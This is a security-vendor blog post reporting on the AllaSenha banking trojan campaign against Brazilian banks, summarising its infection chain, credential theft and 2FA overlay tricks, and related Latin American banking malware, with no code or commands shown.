AllaSenha: The Mobile Malware Threatening Brazilian Banks

Brazilian banking institutions have become targets of a sophisticated cyberattack campaign involving a custom variant of the Windows-based AllaKore remote access trojan (RAT), now known as AllaSenha. Here, we delve into the technical intricacies of AllaSenha, its attack vector, and its implications for Brazilian banks and their customers.

The AllaSenha Campaign

AllaSenha is specifically engineered to steal credentials necessary for accessing Brazilian bank accounts. Leveraging Azure cloud services for its command-and-control (C2) infrastructure, the malware represents a significant evolution in cyber threats targeting financial institutions.

Targeted Financial Institutions

The campaign targets major Brazilian banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. Although the precise method of initial infection remains uncertain, phishing messages containing malicious links are strongly believed to be the primary vector.

Attack Initiation and Malware Deployment

The attack typically begins with a malicious Windows shortcut (LNK) file disguised as a PDF document, "NotaFiscal.pdf.lnk," which has been hosted on a WebDAV server since March 2024. Once launched, this LNK file executes a Windows command shell. The shell opens a decoy PDF file to distract the recipient while simultaneously retrieving a batch script (BAT) payload named "c.cmd" from the same WebDAV server.

The BPyCode Launcher

Dubbed the BPyCode launcher, this BAT payload triggers a Base64-encoded PowerShell command. The command then downloads the Python binary from the official website to execute a Python script named BPyCode. BPyCode is a downloader for a dynamic-link library (DLL) called "executor.dll," which runs in memory. The DLL is fetched from domain names generated via a domain generation algorithm (DGA), often associated with Microsoft Azure Functions service for dynamic infrastructure deployment.

Multi-stage Payload Delivery

The BPyCode script retrieves a pickle file containing three components: a second Python loader script, a ZIP archive with the PythonMemoryModule package, and another ZIP archive containing "executor.dll." The new Python loader script uses PythonMemoryModule to load "executor.dll," a Borland Delphi-based malware named ExecutorLoader, directly into memory. ExecutorLoader's primary role is to decode and execute AllaSenha by injecting it into a legitimate mshta.exe process.

Credential Theft and Two-Factor Authentication Bypass

AllaSenha's primary objective is to steal online banking credentials from web browsers. Additionally, it can display overlay windows to capture two-factor authentication (2FA) codes. It can even deceive victims into scanning a QR code to approve fraudulent transactions initiated by the attackers. This sophisticated method allows the malware to bypass standard security measures, posing a severe risk to banking security.

Links to KL Gorki Project

All AllaSenha samples use the file name "Access_PC_Client_dll.dll." This file name is also associated with the KL Gorki project, a banking malware that combines components of AllaKore and ServerSocket. Furthermore, a Portuguese-speaking user named bert1m has been identified as a potential developer of the malware, although there is no concrete evidence linking them to its operation.

Broader Implications and Regional Trends

The AllaSenha campaign highlights a broader trend of cybercrime originating from Latin America. Cybercriminals in this region appear to be particularly adept at launching campaigns to steal banking details. While their primary targets are individuals in Latin America, they often compromise systems operated by subsidiaries or employees of international companies based in Brazil, extending their global reach.

Other Banking Trojans in the Region

The emergence of AllaSenha is part of a larger pattern of banking trojan attacks in Latin America. For example, Forcepoint recently detailed malspam campaigns distributing another banking trojan, Casbaneiro (aka Metamorfo and Ponteiro), aiming to siphon victims' financial information. This malware, distributed via HTML attachments in emails, lures users into executing malicious code, leading to data compromise.

Android Banking Trojans: A Parallel Threat

Windows is not the only platform under attack. There's also an Android banking malware campaign involving Anatsa (TeaBot and Toddler). These attacks utilize decoy applications uploaded to the Google Play Store disguised as legitimate productivity tools. Once installed, these apps exfiltrate sensitive banking credentials using overlay and accessibility techniques.

The AllaSenha campaign underscores the growing sophistication and regional focus of cyber threats targeting financial institutions. As cybercriminals continue to refine their methods and expand their reach, it becomes increasingly critical for banks and their customers to adopt robust security measures. Awareness and vigilance remain key defenses against these evolving threats.

By Willa
May 31, 2024
Trojan
English
May 31, 2024
Trojan

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

5 years ago

What is the OperaGXSetup.exe File and is it Malicious?

11 months ago

Eporner.com And Why Its Excessive Pop-Ups Are Risky

11 days ago

HackTool:Win32/Crack: a Malicious Threat That Can Seriously...

7 months ago

Take Note: Someone Added You As Their Recovery Email Scam

10 months ago

A Potentially Serious Threat: Trojan:Win32/Suschil!rfn

18 days ago

Related Posts

Android Malware

AIVARAT Mobile Malware

AIVARAT is the name of a newly detected strain of mobile malware. The new threat is a remote access trojan or a RAT, as the name implies. The capabilities of the new malware are considerable. AIVARAT can scrape and... Read more

July 15, 2022
Android Malware

PINEFLOWER Mobile Malware

PINEFLOWER is the name of a family of mobile malware variants that is associated with an Iranian advanced persistent threat actor that is believed to be sponsored by the state. A research team with security firm... Read more

September 16, 2022
Malware

Dracarys Mobile Malware

A powerful and highly hurtful mobile malware is attacking Android users relentlessly. Named the Dracarys Mobile Malware, it can be installed on a targeted device when its user downloads a fake Signal messaging... Read more

August 11, 2022
English
Loading...

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2025 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.